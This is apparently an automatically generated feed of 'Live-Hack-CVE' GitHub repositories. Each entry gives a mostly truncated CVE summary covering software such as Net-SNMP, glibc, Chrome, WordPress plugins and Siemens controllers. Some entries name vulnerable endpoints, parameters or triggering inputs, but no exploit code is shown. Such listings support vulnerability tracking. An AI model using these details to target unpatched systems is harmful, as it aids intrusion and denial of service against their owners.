**handle_ipv6IpForwarding in agent/mibgroup/ip-mib/ip_scalars.c in Net-SNMP 5.4.3 through 5.9.3 has a NULL Pointer Exception bug that can be used by a remote attacker to cause the instance to crash via a crafted UDP packet, resulting in Denial of Service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44793](https://github.com/Live-Hack-CVE/CVE-2022-44793) create time: 2022-12-28T12:18:53Z

**handle_ipDefaultTTL in agent/mibgroup/ip-mib/ip_scalars.c in Net-SNMP 5.8 through 5.9.3 has a NULL Pointer Exception bug that can be used by a remote attacker (who has write access) to cause the instance to crash via a crafted UDP packet, resulting in Denial of Service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44792](https://github.com/Live-Hack-CVE/CVE-2022-44792) create time: 2022-12-28T12:18:49Z

**Privilege escalation vulnerability in DXL Broker for Windows prior to 6.0.0.280 allows local users to gain elevated privileges by exploiting weak directory controls in the logs directory. This can lead to a denial-of-service attack on the DXL Broker. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2188](https://github.com/Live-Hack-CVE/CVE-2022-2188) create time: 2022-12-28T12:18:42Z

**Food Ordering Management System v1.0 was discovered to contain a SQL injection vulnerability via the component /foms/all-orders.php?status=Cancelled%20by%20Customer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42990](https://github.com/Live-Hack-CVE/CVE-2022-42990) create time: 2022-12-28T12:18:39Z

**A vulnerability classified as critical has been found in SourceCodester Sanitization Management System. Affected is an unknown function of the file /php-sms/classes/Master.php?f=save_quote. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been dis CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3868](https://github.com/Live-Hack-CVE/CVE-2022-3868) create time: 2022-12-28T12:18:36Z

**Code Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3869](https://github.com/Live-Hack-CVE/CVE-2022-3869) create time: 2022-12-28T12:18:32Z

**A vulnerability has been identified in RUGGEDCOM ROS RMC30 V4.X (All versions), RUGGEDCOM ROS RMC8388 V4.X (All versions), RUGGEDCOM ROS RMC8388 V5.X (All versions < V5.6.0), RUGGEDCOM ROS RP110 V4.X (All versions), RUGGEDCOM ROS RS1600 V4.X (All versions), RUGGEDCOM ROS RS1600F V4.X (All versions), RUGGEDCOM ROS RS160 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39158](https://github.com/Live-Hack-CVE/CVE-2022-39158) create time: 2022-12-28T12:18:19Z

**A vulnerability has been identified in SIMATIC Drive Controller family (All versions < V2.9.2), SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants) (All versions), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions < V21.9), SIMATIC S7-1200 CPU family (incl. SIPLUS CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38465](https://github.com/Live-Hack-CVE/CVE-2022-38465) create time: 2022-12-28T12:18:16Z

**A UNIX Symbolic Link (Symlink) Following vulnerability in keylime of openSUSE Tumbleweed allows local attackers to escalate from the keylime user to root. This issue affects: openSUSE Tumbleweed keylime versions prior to 6.4.2-1.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31250](https://github.com/Live-Hack-CVE/CVE-2022-31250) create time: 2022-12-28T12:18:09Z

**The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23219](https://github.com/Live-Hack-CVE/CVE-2022-23219) create time: 2022-12-28T12:17:58Z

**The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23218](https://github.com/Live-Hack-CVE/CVE-2022-23218) create time: 2022-12-28T12:17:55Z

**In Splunk Enterprise versions below 8.2.9, 8.1.12, and 9.0.2, an authenticated user can run risky commands using a more privileged user’s permissions to bypass SPL safeguards for risky commands https://docs.splunk.com/Documentation/SplunkCloud/latest/Security/SPLsafeguards in the Analytics Workspace. The vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43566](https://github.com/Live-Hack-CVE/CVE-2022-43566) create time: 2022-12-28T12:17:51Z

**A UNIX Symbolic Link (Symlink) Following vulnerability in the systemd service file for watchman of openSUSE Backports SLE-15-SP3, Factory allows local attackers to escalate to root. This issue affects: openSUSE Backports SLE-15-SP3 watchman versions prior to 4.9.0. openSUSE Factory watchman versions prior to 4.9.0-9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21944](https://github.com/Live-Hack-CVE/CVE-2022-21944) create time: 2022-12-28T12:17:33Z

**In Splunk Enterprise versions below 8.2.9 and 8.1.12, the way that the ‘tstats command handles Javascript Object Notation (JSON) lets an attacker bypass SPL safeguards for risky commands https://docs.splunk.com/Documentation/SplunkCloud/latest/Security/SPLsafeguards . The vulnerability requires the attacker to phish th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43565](https://github.com/Live-Hack-CVE/CVE-2022-43565) create time: 2022-12-28T12:17:29Z

**Multiple unspecified vulnerabilities in Google V8 before 3.24.35.33, as used in Google Chrome before 34.0.1847.131 on Windows and OS X and before 34.0.1847.132 on Linux, allow attackers to cause a denial of service or possibly have other impact via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-1735](https://github.com/Live-Hack-CVE/CVE-2014-1735) create time: 2022-12-28T10:48:59Z

**Google V8, as used in Google Chrome before 33.0.1750.152 on OS X and Linux and before 33.0.1750.154 on Windows, allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-1705](https://github.com/Live-Hack-CVE/CVE-2014-1705) create time: 2022-12-28T10:48:38Z

**The ScopedClipboardWriter::WritePickledData function in ui/base/clipboard/scoped_clipboard_writer.cc in Google Chrome before 33.0.1750.152 on OS X and Linux and before 33.0.1750.154 on Windows does not verify a certain format value, which allows remote attackers to cause a denial of service or possibly have unspecified CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-1714](https://github.com/Live-Hack-CVE/CVE-2014-1714) create time: 2022-12-28T10:48:34Z

**Use-after-free vulnerability in the AttributeSetter function in bindings/templates/attributes.cpp in the bindings in Blink, as used in Google Chrome before 33.0.1750.152 on OS X and Linux and before 33.0.1750.154 on Windows, allows remote attackers to cause a denial of service or possibly have unspecified other impact CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-1713](https://github.com/Live-Hack-CVE/CVE-2014-1713) create time: 2022-12-28T10:48:30Z

**Directory traversal vulnerability in Google Chrome before 33.0.1750.152 on OS X and Linux and before 33.0.1750.154 on Windows has unspecified impact and attack vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-1715](https://github.com/Live-Hack-CVE/CVE-2014-1715) create time: 2022-12-28T10:48:26Z

**Integer overflow in api.cc in Google V8, as used in Google Chrome before 34.0.1847.131 on Windows and OS X and before 34.0.1847.132 on Linux, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a large length value. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-1736](https://github.com/Live-Hack-CVE/CVE-2014-1736) create time: 2022-12-28T10:48:22Z

**Multiple unspecified vulnerabilities in Google Chrome before 34.0.1847.131 on Windows and OS X and before 34.0.1847.132 on Linux allow attackers to cause a denial of service or possibly have other impact via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-1734](https://github.com/Live-Hack-CVE/CVE-2014-1734) create time: 2022-12-28T10:48:19Z

**The Public Key Pinning (PKP) implementation in Google Chrome before 36.0.1985.143 on Windows, OS X, and Linux, and before 36.0.1985.135 on Android, does not correctly consider the properties of SPDY connections, which allows remote attackers to obtain sensitive information by leveraging the use of multiple domain names CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-3166](https://github.com/Live-Hack-CVE/CVE-2014-3166) create time: 2022-12-28T10:48:15Z

**core/html/HTMLSelectElement.cpp in the DOM implementation in Blink, as used in Google Chrome before 34.0.1847.131 on Windows and OS X and before 34.0.1847.132 on Linux, does not properly check renderer state upon a focus event, which allows remote attackers to cause a denial of service or possibly have unspecified othe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-1731](https://github.com/Live-Hack-CVE/CVE-2014-1731) create time: 2022-12-28T10:48:11Z

**Google V8, as used in Google Chrome before 34.0.1847.131 on Windows and OS X and before 34.0.1847.132 on Linux, does not properly store internationalization metadata, which allows remote attackers to bypass intended access restrictions by leveraging "type confusion" and reading property values, related to i18n.js and r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-1730](https://github.com/Live-Hack-CVE/CVE-2014-1730) create time: 2022-12-28T10:48:07Z

**Multiple vulnerabilities exists in Aruba Instate before 4.1.3.0 and 4.2.3.1 due to insufficient validation of user-supplied input and insufficient checking of parameters, which could allow a malicious user to bypass security restrictions, obtain sensitive information, perform unauthorized actions and execute arbitrary CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2031](https://github.com/Live-Hack-CVE/CVE-2016-2031) create time: 2022-12-28T10:53:53Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4274, CVE-2016-4275, CVE-2016-428 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4276](https://github.com/Live-Hack-CVE/CVE-2016-4276) create time: 2022-12-28T10:06:53Z

**There is a reachable assertion in the Internal::TiffReader::visitDirectory function in tiffvisitor.cpp of Exiv2 0.26 that will lead to a remote denial of service attack via crafted input. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-11683](https://github.com/Live-Hack-CVE/CVE-2017-11683) create time: 2022-12-28T10:47:39Z

**In the Linux kernel through 5.4.6, there are information leaks of uninitialized memory to a USB device in the drivers/net/can/usb/kvaser_usb/kvaser_usb_leaf.c driver, aka CID-da2311a6385c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19947](https://github.com/Live-Hack-CVE/CVE-2019-19947) create time: 2022-12-28T10:58:33Z

**Improper input validation in the API for Intel(R) Graphics Driver versions before 26.20.100.7209 may allow an authenticated user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14591](https://github.com/Live-Hack-CVE/CVE-2019-14591) create time: 2022-12-28T10:57:04Z

**Improper access control in the API for the Intel(R) Graphics Driver versions before 26.20.100.7209 may allow an authenticated user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14590](https://github.com/Live-Hack-CVE/CVE-2019-14590) create time: 2022-12-28T10:57:01Z

**Out of bounds read in a subsystem for Intel(R) Graphics Driver versions before 26.20.100.7209 may allow an authenticated user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14574](https://github.com/Live-Hack-CVE/CVE-2019-14574) create time: 2022-12-28T10:56:57Z

**Buffer overflow in Kernel Mode module for Intel(R) Graphics Driver before version 25.20.100.6618 (DCH) or 21.20.x.5077 (aka15.45.5077) may allow a privileged user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11113](https://github.com/Live-Hack-CVE/CVE-2019-11113) create time: 2022-12-28T10:56:54Z

**Pointer corruption in the Unified Shader Compiler in Intel(R) Graphics Drivers before 10.18.14.5074 (aka 15.36.x.5074) may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11111](https://github.com/Live-Hack-CVE/CVE-2019-11111) create time: 2022-12-28T10:56:51Z

**Insufficient input validation in Kernel Mode module for Intel(R) Graphics Driver before version 25.20.100.6519 may allow an authenticated user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11089](https://github.com/Live-Hack-CVE/CVE-2019-11089) create time: 2022-12-28T10:56:47Z

**An incorrect permissions check was discovered in libvirt 4.8.0 and above. The readonly permission was allowed to invoke APIs depending on the guest agent, which could lead to potentially disclosing unintended information or denial of service by causing libvirt to block. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3886](https://github.com/Live-Hack-CVE/CVE-2019-3886) create time: 2022-12-28T10:55:03Z

**Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Serv CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2729](https://github.com/Live-Hack-CVE/CVE-2019-2729) create time: 2022-12-28T10:54:56Z

**A symlink following vulnerability in the packaging of mailman in SUSE Linux Enterprise Server 11, SUSE Linux Enterprise Server 12; openSUSE Leap 15.1 allowed local attackers to escalate their privileges from user wwwrun to root. Additionally arbitrary files could be changed to group mailman. This issue affects: SUSE Li CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3693](https://github.com/Live-Hack-CVE/CVE-2019-3693) create time: 2022-12-28T10:54:39Z

**UNIX Symbolic Link (Symlink) Following vulnerability in the trousers package of SUSE Linux Enterprise Server 15 SP1; openSUSE Factory allowed local attackers escalate privileges from user tss to root. This issue affects: SUSE Linux Enterprise Server 15 SP1 trousers versions prior to 0.3.14-6.3.1. openSUSE Factory trous CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18898](https://github.com/Live-Hack-CVE/CVE-2019-18898) create time: 2022-12-28T10:54:35Z

**An issue was discovered in WSO2 API Manager 2.6.0. A potential Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Datasource creation page of the Management Console. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20434](https://github.com/Live-Hack-CVE/CVE-2019-20434) create time: 2022-12-28T10:54:32Z

**A Symbolic Link (Symlink) Following vulnerability in the packaging of munin in openSUSE Factory, Leap 15.1 allows local attackers to escalate from user munin to root. This issue affects: openSUSE Factory munin version 2.0.49-4.2 and prior versions. openSUSE Leap 15.1 munin version 2.0.40-lp151.1.1 and prior versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3694](https://github.com/Live-Hack-CVE/CVE-2019-3694) create time: 2022-12-28T10:54:28Z

**An issue was discovered in WSO2 API Manager 2.6.0. A reflected XSS attack could be performed in the inline API documentation editor page of the API Publisher by sending an HTTP GET request with a harmful docName request parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20435](https://github.com/Live-Hack-CVE/CVE-2019-20435) create time: 2022-12-28T10:54:25Z

**An issue was discovered in WSO2 API Manager 2.6.0, WSO2 IS as Key Manager 5.7.0, and WSO2 Identity Server 5.8.0. When a custom claim dialect with an XSS payload is configured in the identity provider basic claim configuration, that payload gets executed, if a user picks up that dialect's URI as the provisioning claim i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20437](https://github.com/Live-Hack-CVE/CVE-2019-20437) create time: 2022-12-28T10:54:21Z

**An issue was discovered in WSO2 API Manager 2.6.0, WSO2 IS as Key Manager 5.7.0, and WSO2 Identity Server 5.8.0. If there is a claim dialect configured with an XSS payload in the dialect URI, and a user picks up this dialect's URI and adds it as the service provider claim dialect while configuring the service provider, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20436](https://github.com/Live-Hack-CVE/CVE-2019-20436) create time: 2022-12-28T10:54:00Z

**An issue was discovered in WSO2 API Manager 2.6.0. A potential Reflected Cross-Site Scripting (XSS) vulnerability has been identified in defining a scope in the "manage the API" page of the API Publisher. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20439](https://github.com/Live-Hack-CVE/CVE-2019-20439) create time: 2022-12-28T10:53:57Z

**The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10029](https://github.com/Live-Hack-CVE/CVE-2020-10029) create time: 2022-12-28T10:57:08Z

**A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10770](https://github.com/Live-Hack-CVE/CVE-2020-10770) create time: 2022-12-28T10:55:17Z

**An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15500](https://github.com/Live-Hack-CVE/CVE-2020-15500) create time: 2022-12-28T10:55:13Z

**A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue ex CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7246](https://github.com/Live-Hack-CVE/CVE-2020-7246) create time: 2022-12-28T10:54:59Z

**A flaw was found in infinispan 10 REST API, where authorization permissions are not checked while performing some server management operations. When authz is enabled, any user with authentication can perform operations like shutting down the server without the ADMIN role. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25711](https://github.com/Live-Hack-CVE/CVE-2020-25711) create time: 2022-12-28T10:54:49Z

**A buffer overflow vulnerability in the Databuf function in types.cpp of Exiv2 v0.27.1 leads to a denial of service (DOS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19716](https://github.com/Live-Hack-CVE/CVE-2020-19716) create time: 2022-12-28T10:47:36Z

**The Chameleon CSS WordPress plugin through 1.2 does not have any CSRF and capability checks in all its AJAX calls, allowing any authenticated user, such as subscriber to call them and perform unauthorised actions. One of AJAX call, remove_css, also does not sanitise or escape the css_id POST parameter before using it i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24626](https://github.com/Live-Hack-CVE/CVE-2021-24626) create time: 2022-12-28T10:58:44Z

**The Simple Download Monitor WordPress plugin before 3.9.6 saves logs in a predictable location, and does not have any authentication or authorisation in place to prevent unauthenticated users to download and read the logs containing Sensitive Information such as IP Addresses and Usernames CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24695](https://github.com/Live-Hack-CVE/CVE-2021-24695) create time: 2022-12-28T10:58:40Z

**A carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the Denounce plugin, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.11.0 or later. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40369](https://github.com/Live-Hack-CVE/CVE-2021-40369) create time: 2022-12-28T10:58:37Z

**The Weather Effect WordPress plugin before 1.3.4 does not have any CSRF checks in place when saving its settings, and do not validate or escape them, which could lead to Stored Cross-Site Scripting issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24683](https://github.com/Live-Hack-CVE/CVE-2021-24683) create time: 2022-12-28T10:58:30Z

**The Poll Maker WordPress plugin before 3.4.2 allows unauthenticated users to perform SQL injection via the ays_finish_poll AJAX action. While the result is not disclosed in the response, it is possible to use a timing attack to exfiltrate data such as password hash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24651](https://github.com/Live-Hack-CVE/CVE-2021-24651) create time: 2022-12-28T10:58:26Z

**The Wp Cookie Choice WordPress plugin through 1.1.0 is lacking any CSRF check when saving its options, and do not escape them when outputting them in attributes. As a result, an attacker could make a logged in admin change them to arbitrary values including XSS payloads via a CSRF attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24595](https://github.com/Live-Hack-CVE/CVE-2021-24595) create time: 2022-12-28T10:58:23Z

**The Scroll Baner WordPress plugin through 1.0 does not have CSRF check in place when saving its settings, nor perform any sanitisation, escaping or validation on them. This could allow attackers to make logged in admin change them and could lead to RCE (via a file upload) as well as XSS CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24642](https://github.com/Live-Hack-CVE/CVE-2021-24642) create time: 2022-12-28T10:58:19Z

**The Wechat Reward WordPress plugin through 1.7 does not sanitise or escape its QR settings, nor has any CSRF check in place, allowing attackers to make a logged in admin change the settings and perform Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24615](https://github.com/Live-Hack-CVE/CVE-2021-24615) create time: 2022-12-28T10:58:16Z

**The Stylish Cost Calculator WordPress plugin before 7.0.4 does not have any authorisation and CSRF checks on some of its AJAX actions (available to authenticated users), which could allow any authenticated users, such as subscriber to call them, and perform Stored Cross-Site Scripting attacks against logged in admin, a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24822](https://github.com/Live-Hack-CVE/CVE-2021-24822) create time: 2022-12-28T10:58:09Z

**net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44716](https://github.com/Live-Hack-CVE/CVE-2021-44716) create time: 2022-12-28T10:57:59Z

**The Logo Carousel WordPress plugin before 3.4.2 allows users with a role as low as Contributor to duplicate and view arbitrary private posts made by other users via the Carousel Duplication feature CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24739](https://github.com/Live-Hack-CVE/CVE-2021-24739) create time: 2022-12-28T10:57:49Z

**The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43980](https://github.com/Live-Hack-CVE/CVE-2021-43980) create time: 2022-12-28T10:56:20Z

**The HW_KEYMASTER module lacks the validity check of the key format. Successful exploitation of this vulnerability may result in out-of-bounds memory access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40017](https://github.com/Live-Hack-CVE/CVE-2021-40017) create time: 2022-12-28T10:56:04Z

**A Missing Authentication for Critical Function vulnerability in longhorn of SUSE Longhorn allows attackers to connect to a longhorn-engine replica instance granting it the ability to read and write data to and from a replica that they should not have access to. This issue affects: SUSE Longhorn longhorn versions prior CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36780](https://github.com/Live-Hack-CVE/CVE-2021-36780) create time: 2022-12-28T10:50:57Z

**A Missing Authentication for Critical Function vulnerability in SUSE Longhorn allows any workload in the cluster to execute any binary present in the image on the host without authentication. This issue affects: SUSE Longhorn longhorn versions prior to 1.1.3; longhorn versions prior to 1.2.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36779](https://github.com/Live-Hack-CVE/CVE-2021-36779) create time: 2022-12-28T10:50:33Z

**A flaw was found in Wildfly. An incorrect JBOSS_LOCAL_USER challenge location when using the elytron configuration may lead to JBOSS_LOCAL_USER access to all users on the machine. The highest threat from this vulnerability is to confidentiality, integrity, and availability. This flaw affects wildfly-core versions prior CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3717](https://github.com/Live-Hack-CVE/CVE-2021-3717) create time: 2022-12-28T10:48:49Z

**A flaw was found in Undertow. A potential security issue in flow control handling by the browser over http/2 may potentially cause overhead or a denial of service in the server. The highest threat from this vulnerability is availability. This flaw affects Undertow versions prior to 2.0.40.Final and prior to 2.2.11.Fina CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3629](https://github.com/Live-Hack-CVE/CVE-2021-3629) create time: 2022-12-28T10:48:45Z

**A flaw was found in undertow. The HTTP2SourceChannel fails to write the final frame under some circumstances, resulting in a denial of service. The highest threat from this vulnerability is availability. This flaw affects Undertow versions prior to 2.0.35.SP1, prior to 2.2.6.SP1, prior to 2.2.7.SP1, prior to 2.0.36.SP1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3597](https://github.com/Live-Hack-CVE/CVE-2021-3597) create time: 2022-12-28T10:48:41Z

**cmd/go in Go before 1.16.14 and 1.17.x before 1.17.7 can misinterpret branch names that falsely appear to be version tags. This can lead to incorrect access control if an actor is supposed to be able to create branches but not tags. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23773](https://github.com/Live-Hack-CVE/CVE-2022-23773) create time: 2022-12-28T10:58:13Z

**pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21724](https://github.com/Live-Hack-CVE/CVE-2022-21724) create time: 2022-12-28T10:57:56Z

**Rat.SetString in math/big in Go before 1.16.14 and 1.17.x before 1.17.7 has an overflow that can lead to Uncontrolled Memory Consumption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23772](https://github.com/Live-Hack-CVE/CVE-2022-23772) create time: 2022-12-28T10:57:52Z

**OpenFGA is a high-performance authorization/permission engine inspired by Google Zanzibar. Versions prior to 0.2.5 are vulnerable to authorization bypass under certain conditions. You are affected by this vulnerability if you added a tuple with a wildcard (*) assigned to a tupleset relation (the right hand side of a †CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39352](https://github.com/Live-Hack-CVE/CVE-2022-39352) create time: 2022-12-28T10:57:46Z

**Unauthorized access to Gateway user capabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27510](https://github.com/Live-Hack-CVE/CVE-2022-27510) create time: 2022-12-28T10:57:42Z

**Remote desktop takeover via phishing CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27513](https://github.com/Live-Hack-CVE/CVE-2022-27513) create time: 2022-12-28T10:57:20Z

**Out of bounds write in Storage in Google Chrome prior to 105.0.5195.125 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3195](https://github.com/Live-Hack-CVE/CVE-2022-3195) create time: 2022-12-28T10:57:16Z

**Azure RTOS FileX is a FAT-compatible file system that’s fully integrated with Azure RTOS ThreadX. In versions before 6.2.0, the Fault Tolerant feature of Azure RTOS FileX includes integer under and overflows which may be exploited to achieve buffer overflow and modify memory contents. When a valid log file with corre CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39343](https://github.com/Live-Hack-CVE/CVE-2022-39343) create time: 2022-12-28T10:57:13Z

**Due to the formatting logic of the "console.table()" function it was not safe to allow user controlled input to be passed to the "properties" parameter while simultaneously passing a plain object with at least one property as the first parameter, which could be "__proto__". The prototype pollution has very limited cont CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21824](https://github.com/Live-Hack-CVE/CVE-2022-21824) create time: 2022-12-28T10:56:44Z

**Multiple vulnerabilities in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to gain elevated privileges. These vulnerabilities are due to improper access controls on commands within the application CLI. An attacker could exploit these vulnerabilities by running a malicious command on the a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20775](https://github.com/Live-Hack-CVE/CVE-2022-20775) create time: 2022-12-28T10:56:40Z

**Multiple vulnerabilities in the API and in the web-based management interface of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow a remote attacker to overwrite arbitrary files or conduct null byte poisoning attacks on an affected device. Note: Cisco Expressway Series refers t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20812](https://github.com/Live-Hack-CVE/CVE-2022-20812) create time: 2022-12-28T10:56:37Z

**In sysmmu_unmap of TBD, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-233606615References: N/A CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20364](https://github.com/Live-Hack-CVE/CVE-2022-20364) create time: 2022-12-28T10:56:34Z

**OAuthLib is an implementation of the OAuth request-signing logic for Python 3.6+. In OAuthLib versions 3.1.1 until 3.2.1, an attacker providing malicious redirect uri can cause denial of service. An attacker can also leverage usage of `uri_validate` functions depending where it is used. OAuthLib applications using OAut CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36087](https://github.com/Live-Hack-CVE/CVE-2022-36087) create time: 2022-12-28T10:56:30Z

**In smc_intc_request_fiq of arm_gic.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-211485702Referen CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20231](https://github.com/Live-Hack-CVE/CVE-2022-20231) create time: 2022-12-28T10:56:27Z

